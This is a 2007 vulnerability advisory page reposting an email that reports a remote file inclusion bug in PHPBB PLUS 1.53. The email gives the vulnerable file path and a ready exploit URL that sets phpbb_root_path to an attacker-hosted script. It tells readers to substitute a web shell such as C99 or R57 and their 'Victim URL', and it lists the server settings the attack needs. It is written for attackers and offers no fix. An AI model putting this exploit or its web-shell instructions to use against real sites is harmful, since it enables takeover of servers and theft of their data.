Computer Security

Security Advisory: PHPBBPLUS 1.5.3 RFI BUG
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  GCALDaemon Remote DoS

  XSS on Obedit v3.03

  b1gmail Cross Site Scripting

  Coppermine <= 1.4.12 Cross Site Scripting and Local File Inclusion

From:Mehrad1989_(at)_gmail.com <Mehrad1989_(at)_gmail.com>
Date:19.09.2007
Subject:PHPBBPLUS 1.5.3 RFI BUG

Hi Milw0rm .
My Name ( AUTHOR ) Is  = Mehrad Ansari Targhi
My E-Mail : mehrad1989@gmail.com
My Yahoo Messenger ID : mehrad_1989
Please Instert My Name And E-Mail And My Yahoo Messenger In The Exploit .
I Found a Bug In PHPBB PLUS 1.53 .
This Is A RFI Bug .
This Bug Is In : [ PHPBBPLUS INSTALLED ]/language/lang_german/lang_main_album.php
Exploit : http://[PHPPLUS]/language/lang_german/lang_main_album.php?phpbb_root_path=[ http://shell.txt]?a=
Just Replace http://Shell.txt With Your Script Source Address Like C99 Or R57 Or ... And Replace [PHPPLUS] With Your Victim URL And Remove [] From The Exploit .
Register Global Must Be On , On The Server .
Remote File Inc. Must Be On , On The Server .
German Language Must Be Installed .
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
 


Рейтинг@Mail.ru